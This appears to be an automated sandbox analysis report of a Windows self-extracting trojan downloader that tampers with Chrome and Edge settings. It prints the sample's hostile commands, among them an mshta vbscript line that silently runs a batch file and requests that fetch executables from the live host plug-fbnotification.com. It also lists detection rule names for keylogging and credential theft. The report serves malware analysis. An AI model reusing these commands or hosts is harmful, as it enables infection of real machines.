Category | Machine | Started | Completed |
---|---|---|---|
FILE | s1_win7_x6401 | March 27, 2021, 3:43 p.m. | March 27, 2021, 3:48 p.m. |
-
-
-
regedit.exe regedit /s chrome.reg
2760 -
taskkill.exe TASKKILL /F /IM chrome.exe
2888 -
-
-
-
-
chrome.exe "C:\Program Files (x86)\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\test22\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\test22\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\test22\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=65.0.3325.181 --initial-client-data=0x88,0x8c,0x90,0x84,0x94,0x7fef1c6f1e8,0x7fef1c6f1f8,0x7fef1c6f208
1444 -
chrome.exe "C:\Program Files (x86)\Google\Chrome\Application\chrome.exe" --type=watcher --main-thread-id=2696 --on-initialized-event-handle=316 --parent-handle=320 /prefetch:6
1684
-
-
-
-
-
regedit.exe regedit /s chrome-set.reg
1296
-
-
-
explorer.exe C:\Windows\Explorer.EXE
1848
Name | Response | Post-Analysis Lookup |
---|---|---|
get.geojs.io | 172.67.70.233 | |
www.plug-fbnotification.com |
CNAME
plug-fbnotification.com
|
35.220.162.170 |
Suricata Alerts
No Suricata Alerts
Suricata TLS
Flow | Issuer | Subject | Fingerprint |
---|---|---|---|
TLS 1.2 192.168.56.101:49199 172.67.70.233:443 |
C=US, O=Cloudflare, Inc., CN=Cloudflare Inc ECC CA-3 | C=US, ST=CA, L=San Francisco, O=Cloudflare, Inc., CN=sni.cloudflaressl.com | e8:2c:6d:12:8c:c5:ce:c7:42:39:90:96:aa:d5:c8:a2:5f:50:74:73 |
registry | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\MachineGuid |
pdb_path | D:\Projects\WinRAR\sfx\build\sfxrar32\Release\sfxrar.pdb |
file | C:\Program Files (x86)\Google\Chrome\Application\chrome.exe |
section | .didat |
resource name | PNG |
request | GET http://www.plug-fbnotification.com/coloqaq/parse.exe |
request | GET http://www.plug-fbnotification.com/coloqaq/curl.exe |
file | C:\Users\test22\AppData\Local\Google\Chrome\User Data\CrashpadMetrics-spare.pma |
file | C:\Users\test22\AppData\Local\Google\Chrome\User Data\Safe Browsing Bloom Prefix Set |
file | C:\Users\test22\AppData\Local\Google\Chrome\User Data\BrowserMetrics |
file | C:\Users\test22\AppData\Local\Google\Chrome\User Data\ShaderCache\GPUCache |
file | C:\Users\test22\AppData\Local\Google\Chrome\User Data\Stability\2772-1616827593802750.pma |
file | C:\Users\test22\AppData\Local\Google\Chrome\User Data\Safe Browsing\ChromeFilenameClientIncident.store |
file | C:\Users\test22\AppData\Local\Google\Chrome\User Data\BrowserMetrics\BrowserMetrics-605EE790-AD4.pma |
file | C:\Users\test22\AppData\Local\Google\Chrome\User Data\Crashpad\settings.dat |
file | C:\Users\test22\AppData\Local\Google\Chrome\User Data\Safe Browsing Csd Whitelist |
file | C:\Users\test22\AppData\Local\Google\Chrome\User Data\CrashpadMetrics-active.pma |
file | C:\Users\test22\AppData\Local\Google\Chrome\User Data\Local State |
file | C:\Users\test22\AppData\Local\Google\Chrome\User Data\BrowserMetrics-spare.pma |
file | C:\Users\test22\AppData\Local\Google\Chrome\User Data\Crashpad |
file | C:\Users\test22\AppData\Local\Google\Chrome\User Data |
file | C:\Users\test22\AppData\Local\Google\Chrome\User Data\First Run |
file | C:\Users\test22\AppData\Local\Google\Chrome\User Data\Crashpad\reports |
file | C:\Users\test22\AppData\Local\Google\Chrome\User Data\Crashpad\reports\15ff4248-f9e3-481d-9f1f-ee763326d2b2.dmp |
file | C:\Users\test22\AppData\Local\Google\Chrome\User Data\ShaderCache\GPUCache\index |
file | C:\Users\test22\AppData\Local\Google\Chrome\User Data\Safe Browsing\AnyIpMalware.store |
file | C:\Users\test22\AppData\Local\Google\Chrome\User Data\Safe Browsing Bloom |
file | C:\Users\test22\AppData\Local\Google\Chrome\User Data\Crashpad\metadata |
file | C:\Users\test22\AppData\Local\Google\Chrome\User Data\ShaderCache\GPUCache\data_0 |
file | C:\Users\test22\AppData\Local\Google\Chrome\User Data\ShaderCache\GPUCache\data_1 |
file | C:\Users\test22\AppData\Local\Google\Chrome\User Data\ShaderCache\GPUCache\data_2 |
file | C:\Users\test22\AppData\Local\Google\Chrome\User Data\ShaderCache\GPUCache\data_3 |
name | PNG | language | LANG_CHINESE | filetype | PNG image data, 186 x 604, 8-bit/color RGB, non-interlaced | sublanguage | SUBLANG_CHINESE_SIMPLIFIED | offset | 0x0006418c | size | 0x000015a9 | ||||||||||||||||||
name | PNG | language | LANG_CHINESE | filetype | PNG image data, 186 x 604, 8-bit/color RGB, non-interlaced | sublanguage | SUBLANG_CHINESE_SIMPLIFIED | offset | 0x0006418c | size | 0x000015a9 | ||||||||||||||||||
name | RT_ICON | language | LANG_CHINESE | filetype | PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced | sublanguage | SUBLANG_CHINESE_SIMPLIFIED | offset | 0x0006aea8 | size | 0x00003d71 | ||||||||||||||||||
name | RT_ICON | language | LANG_CHINESE | filetype | PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced | sublanguage | SUBLANG_CHINESE_SIMPLIFIED | offset | 0x0006aea8 | size | 0x00003d71 | ||||||||||||||||||
name | RT_ICON | language | LANG_CHINESE | filetype | PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced | sublanguage | SUBLANG_CHINESE_SIMPLIFIED | offset | 0x0006aea8 | size | 0x00003d71 | ||||||||||||||||||
name | RT_ICON | language | LANG_CHINESE | filetype | PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced | sublanguage | SUBLANG_CHINESE_SIMPLIFIED | offset | 0x0006aea8 | size | 0x00003d71 | ||||||||||||||||||
name | RT_ICON | language | LANG_CHINESE | filetype | PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced | sublanguage | SUBLANG_CHINESE_SIMPLIFIED | offset | 0x0006aea8 | size | 0x00003d71 | ||||||||||||||||||
name | RT_ICON | language | LANG_CHINESE | filetype | PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced | sublanguage | SUBLANG_CHINESE_SIMPLIFIED | offset | 0x0006aea8 | size | 0x00003d71 | ||||||||||||||||||
name | RT_ICON | language | LANG_CHINESE | filetype | PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced | sublanguage | SUBLANG_CHINESE_SIMPLIFIED | offset | 0x0006aea8 | size | 0x00003d71 | ||||||||||||||||||
name | RT_DIALOG | language | LANG_CHINESE | filetype | data | sublanguage | SUBLANG_CHINESE_SIMPLIFIED | offset | 0x0006f324 | size | 0x000001e6 | ||||||||||||||||||
name | RT_DIALOG | language | LANG_CHINESE | filetype | data | sublanguage | SUBLANG_CHINESE_SIMPLIFIED | offset | 0x0006f324 | size | 0x000001e6 | ||||||||||||||||||
name | RT_DIALOG | language | LANG_CHINESE | filetype | data | sublanguage | SUBLANG_CHINESE_SIMPLIFIED | offset | 0x0006f324 | size | 0x000001e6 | ||||||||||||||||||
name | RT_DIALOG | language | LANG_CHINESE | filetype | data | sublanguage | SUBLANG_CHINESE_SIMPLIFIED | offset | 0x0006f324 | size | 0x000001e6 | ||||||||||||||||||
name | RT_DIALOG | language | LANG_CHINESE | filetype | data | sublanguage | SUBLANG_CHINESE_SIMPLIFIED | offset | 0x0006f324 | size | 0x000001e6 | ||||||||||||||||||
name | RT_DIALOG | language | LANG_CHINESE | filetype | data | sublanguage | SUBLANG_CHINESE_SIMPLIFIED | offset | 0x0006f324 | size | 0x000001e6 | ||||||||||||||||||
name | RT_STRING | language | LANG_CHINESE | filetype | data | sublanguage | SUBLANG_CHINESE_SIMPLIFIED | offset | 0x0006fc3c | size | 0x00000078 | ||||||||||||||||||
name | RT_STRING | language | LANG_CHINESE | filetype | data | sublanguage | SUBLANG_CHINESE_SIMPLIFIED | offset | 0x0006fc3c | size | 0x00000078 | ||||||||||||||||||
name | RT_STRING | language | LANG_CHINESE | filetype | data | sublanguage | SUBLANG_CHINESE_SIMPLIFIED | offset | 0x0006fc3c | size | 0x00000078 | ||||||||||||||||||
name | RT_STRING | language | LANG_CHINESE | filetype | data | sublanguage | SUBLANG_CHINESE_SIMPLIFIED | offset | 0x0006fc3c | size | 0x00000078 | ||||||||||||||||||
name | RT_STRING | language | LANG_CHINESE | filetype | data | sublanguage | SUBLANG_CHINESE_SIMPLIFIED | offset | 0x0006fc3c | size | 0x00000078 | ||||||||||||||||||
name | RT_STRING | language | LANG_CHINESE | filetype | data | sublanguage | SUBLANG_CHINESE_SIMPLIFIED | offset | 0x0006fc3c | size | 0x00000078 | ||||||||||||||||||
name | RT_STRING | language | LANG_CHINESE | filetype | data | sublanguage | SUBLANG_CHINESE_SIMPLIFIED | offset | 0x0006fc3c | size | 0x00000078 | ||||||||||||||||||
name | RT_STRING | language | LANG_CHINESE | filetype | data | sublanguage | SUBLANG_CHINESE_SIMPLIFIED | offset | 0x0006fc3c | size | 0x00000078 | ||||||||||||||||||
name | RT_STRING | language | LANG_CHINESE | filetype | data | sublanguage | SUBLANG_CHINESE_SIMPLIFIED | offset | 0x0006fc3c | size | 0x00000078 | ||||||||||||||||||
name | RT_STRING | language | LANG_CHINESE | filetype | data | sublanguage | SUBLANG_CHINESE_SIMPLIFIED | offset | 0x0006fc3c | size | 0x00000078 | ||||||||||||||||||
name | RT_GROUP_ICON | language | LANG_CHINESE | filetype | data | sublanguage | SUBLANG_CHINESE_SIMPLIFIED | offset | 0x0006fcb4 | size | 0x00000068 | ||||||||||||||||||
name | RT_MANIFEST | language | LANG_CHINESE | filetype | XML 1.0 document, ASCII text, with CRLF line terminators | sublanguage | SUBLANG_CHINESE_SIMPLIFIED | offset | 0x0006fd1c | size | 0x00000753 |
file | C:\Users\test22\AppData\Local\Temp\RarSFX0\edge-set.reg |
file | C:\Users\test22\AppData\Local\Temp\RarSFX0\vcruntime140_1.dll |
file | C:\Users\test22\AppData\Local\Temp\RarSFX0\chrome7.bat |
file | C:\Users\test22\AppData\Local\Temp\RarSFX0\edge.reg |
file | C:\Users\test22\AppData\Local\Temp\RarSFX0\main.exe |
file | C:\Users\test22\AppData\Local\Temp\RarSFX0\chrome-set.reg |
file | C:\Users\test22\AppData\Local\Temp\RarSFX0\edge64.bat |
file | C:\Users\test22\AppData\Local\Temp\RarSFX0\edge86.bat |
file | C:\Users\test22\AppData\Local\Temp\RarSFX0\chrome86.bat |
file | C:\Users\test22\AppData\Local\Temp\RarSFX0\chrome.reg |
file | C:\Users\test22\AppData\Local\Temp\RarSFX0\chrome64.bat |
cmdline | mshta vbscript:createobject("wscript.shell").run("chrome86.bat h",0)(window.close) |
file | C:\Users\test22\AppData\Local\Temp\RarSFX0\main.exe |
wmi | SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = "chrome.exe") |
section | {u'size_of_data': u'0x0000d600', u'virtual_address': u'0x00063000', u'entropy': 6.855402526678264, u'name': u'.rsrc', u'virtual_size': u'0x0000d470'} | entropy | 6.85540252668 | description | A section with a high entropy has been found |
url | https://crashpad.chromium.org/bug/new |
url | https://crashpad.chromium.org/ |
url | https://clients4.google.com/invalidation/android/request/ |
url | http://crl3.digicert.com/DigiCertHighAssuranceEVRootCA.crl0 |
url | http://services.ukrposhta.com/postindex_new/ |
url | http://dts.search-results.com/sr?lng= |
url | http://inposdom.gob.do/codigo-postal/ |
url | http://creativecommons.org/ns |
url | http://www.postur.fo/ |
url | https://qc.search.yahoo.com/search?ei= |
url | https://cacert.omniroot.com/baltimoreroot.crt09 |
url | https://codereview.chromium.org/25305002). |
url | https://search.yahoo.com/search?ei= |
url | http://t1.symcb.com/ThawtePCA.crl0/ |
url | http://crbug.com/31395. |
url | https://support.google.com/chrome/answer/165139 |
url | https://ct.googleapis.com/aviator/ |
url | https://datasaver.googleapis.com/v1/clientConfigs |
url | http://crl.starfieldtech.com/sfroot-g2.crl0L |
url | https://ct.startssl.com/ |
url | https://suggest.yandex.com.tr/suggest-ff.cgi?part= |
url | https://de.search.yahoo.com/favicon.ico |
url | https://github.com/GoogleChrome/Lighthouse/issues |
url | http://www.searchnu.com/favicon.ico |
url | https://support.google.com/installer/?product= |
url | http://msdn.microsoft.com/en-us/library/ms792901.aspx |
url | https://www.najdi.si/search.jsp?q= |
url | http://x.ss2.us/x.cer0 |
url | http://crl.geotrust.com/crls/gtglobal.crl04 |
url | https://accounts.google.com/ServiceLogin |
url | https://accounts.google.com/OAuthLogin |
url | https://c.android.clients.google.com/ |
url | https://search.goo.ne.jp/sgt.jsp?MT= |
url | https://www.google.com/tools/feedback/chrome/__submit |
url | https://chrome.google.com/webstore/category/collection/dark_themes |
url | http://check.googlezip.net/generate_204 |
url | http://ocsp.starfieldtech.com/08 |
url | http://www.guernseypost.com/postcode_finder/ |
url | http://crl.certum.pl/ca.crl0h |
url | http://ator |
url | https://suggest.yandex.by/suggest-ff.cgi?part= |
url | http://feed.snap.do/?q= |
url | https://sp.uk.ask.com/sh/i/a16/favicon/favicon.ico |
url | http://www.language |
url | https://support.google.com/chrome/ |
url | http://developer.chrome.com/apps/declare_permissions.html |
url | https://ct.googleapis.com/rocketeer/ |
url | https://www.globalsign.com/repository/03 |
url | http://www.startssl.com/sfsca.crl0 |
url | http://UA-Compatible |
description | Code injection with CreateRemoteThread in a remote process | rule | inject_thread | ||||||
description | Create a windows service | rule | create_service | ||||||
description | Create a COM server | rule | create_com_service | ||||||
description | Communications over UDP network | rule | network_udp_sock | ||||||
description | Listen for incoming communication | rule | network_tcp_listen | ||||||
description | Communications over P2P network | rule | network_p2p_win | ||||||
description | Communications over HTTP | rule | network_http | ||||||
description | File downloader/dropper | rule | network_dropper | ||||||
description | Communications over FTP | rule | network_ftp | ||||||
description | Communications over RAW socket | rule | network_tcp_socket | ||||||
description | Communications use DNS | rule | network_dns | ||||||
description | Communication using dga | rule | network_dga | ||||||
description | Escalade priviledges | rule | escalate_priv | ||||||
description | Take screenshot | rule | screenshot | ||||||
description | Run a keylogger | rule | keylogger | ||||||
description | Steal credential | rule | cred_local | ||||||
description | Record Audio | rule | sniff_audio | ||||||
description | APC queue tasks migration | rule | migrate_apc | ||||||
description | Malware can spread east-west file | rule | spreading_file | ||||||
description | Malware can spread east-west using share drive | rule | spreading_share | ||||||
description | Create or check mutex | rule | win_mutex | ||||||
description | Affect system registries | rule | win_registry | ||||||
description | Affect system token | rule | win_token | ||||||
description | Affect private profile | rule | win_private_profile | ||||||
description | Affect private profile | rule | win_files_operation | ||||||
description | Match Winsock 2 API library declaration | rule | Str_Win32_Winsock2_Library | ||||||
description | Match Windows Inet API library declaration | rule | Str_Win32_Wininet_Library | ||||||
description | Match Windows Inet API call | rule | Str_Win32_Internet_API | ||||||
description | Match Windows Http API call | rule | Str_Win32_Http_API | ||||||
description | (no description) | rule | DebuggerCheck__GlobalFlags | ||||||
description | (no description) | rule | DebuggerCheck__QueryInfo | ||||||
description | (no description) | rule | DebuggerCheck__RemoteAPI | ||||||
description | (no description) | rule | DebuggerHiding__Thread | ||||||
description | (no description) | rule | DebuggerHiding__Active | ||||||
description | (no description) | rule | DebuggerException__ConsoleCtrl | ||||||
description | (no description) | rule | DebuggerException__SetConsoleCtrl | ||||||
description | (no description) | rule | ThreadControl__Context | ||||||
description | (no description) | rule | SEH__vectored | ||||||
description | (no description) | rule | Check_Dlls | ||||||
description | Checks if being debugged | rule | anti_dbg | ||||||
description | Anti-Sandbox checks for ThreatExpert | rule | antisb_threatExpert | ||||||
description | Bypass DEP | rule | disable_dep | ||||||
description | Affect hook table | rule | win_hook | ||||||
description | Code injection with CreateRemoteThread in a remote process | rule | inject_thread | ||||||
description | Create a windows service | rule | create_service | ||||||
description | Communications over UDP network | rule | network_udp_sock | ||||||
description | Listen for incoming communication | rule | network_tcp_listen | ||||||
description | Communications over P2P network | rule | network_p2p_win | ||||||
description | Communications over HTTP | rule | network_http | ||||||
description | File downloader/dropper | rule | network_dropper |
cmdline | chrome86.bat h |
cmdline | TASKKILL /F /IM chrome.exe |
cmdline | mshta vbscript:createobject("wscript.shell").run("chrome86.bat h",0)(window.close) |
parent_process | chrome.exe | martian_process | "C:\Program Files (x86)\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\test22\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\test22\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\test22\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=65.0.3325.181 --initial-client-data=0x88,0x8c,0x90,0x84,0x94,0x7fef1c6f1e8,0x7fef1c6f1f8,0x7fef1c6f208 | ||||||
parent_process | chrome.exe | martian_process | "C:\Program Files (x86)\Google\Chrome\Application\chrome.exe" --type=watcher --main-thread-id=2696 --on-initialized-event-handle=316 --parent-handle=320 /prefetch:6 | ||||||
parent_process | chrome.exe | martian_process | "C:\Program Files (x86)\Google\Chrome\Application\chrome.exe" --type=gpu-process --field-trial-handle=1196,10079241022053997144,2061932017762601018,131072 --gpu-preferences=KAAAAAAAAAAABwAAAQAAAAAAAAAAAGAAAQAAAAAAAAAIAAAAAAAAACgAAAAEAAAAIAAAAAAAAAAoAAAAAAAAADAAAAAAAAAAOAAAAAAAAAAQAAAAAAAAAAAAAAAKAAAAEAAAAAAAAAAAAAAACwAAABAAAAAAAAAAAQAAAAoAAAAQAAAAAAAAAAEAAAALAAAA --use-gl=swiftshader-webgl --gpu-vendor-id=0x80ee --gpu-device-id=0xbeef --gpu-driver-vendor=Microsoft --gpu-driver-version=6.1.7600.16385 --gpu-driver-date=6-21-2006 --service-request-channel-token=1ED90E1F7EF73F81C1DF9FD996F985E0 --mojo-platform-channel-handle=1204 --ignored=" --type=renderer " /prefetch:2 |
url | http://127.0.0.1 |
Bkav | W32.AIDetect.malware1 |
Elastic | malicious (high confidence) |
MicroWorld-eScan | Trojan.Rasftuby.Gen.14 |
Zillya | Trojan.ScriptKD.JS.10 |
Sangfor | Trojan.Win32.Save.a |
Cybereason | malicious.72d5f4 |
Arcabit | Trojan.Rasftuby.Gen.14 |
APEX | Malicious |
Avast | Win64:RATX-gen [Trj] |
ClamAV | Win.Malware.Rasftuby-9828908-0 |
Kaspersky | HEUR:Trojan.Win32.Runner.vho |
BitDefender | Trojan.Rasftuby.Gen.14 |
Ad-Aware | Trojan.Rasftuby.Gen.14 |
Sophos | ML/PE-A |
F-Secure | Trojan.TR/Dldr.Agent.sbdjj |
DrWeb | Trojan.PWS.Stealer.29941 |
McAfee-GW-Edition | BehavesLike.Win32.Generic.dc |
FireEye | Generic.mg.762ab2472d5f4811 |
Emsisoft | Trojan.Rasftuby.Gen.14 (B) |
eGambit | Unsafe.AI_Score_93% |
Avira | TR/Dldr.Agent.sbdjj |
MAX | malware (ai score=81) |
Antiy-AVL | Trojan[Downloader]/Win64.Agent |
Microsoft | Trojan:Win32/Wacatac.DE!ml |
ZoneAlarm | HEUR:Trojan.Win32.Runner.vho |
GData | Win32.Trojan-Downloader.Generic.H6XZVZ |
Cynet | Malicious (score: 100) |
AhnLab-V3 | Malware/Win32.RL_Generic.R360804 |
ALYac | Trojan.Rasftuby.Gen.14 |
Malwarebytes | Trojan.BrowserModifier.SFX |
ESET-NOD32 | a variant of Win64/TrojanDownloader.Agent.IH |
Rising | Downloader.Agent!8.B23 (CLOUD) |
Yandex | Trojan.DL.Agent!VGwPhdfUXzA |
Fortinet | W64/Agent.IH!tr.dldr |
AVG | Win64:RATX-gen [Trj] |
dead_host | 35.220.162.170:8070 |
dead_host | 192.168.56.101:49209 |
dead_host | 35.220.162.170:8080 |
dead_host | 192.168.56.101:49208 |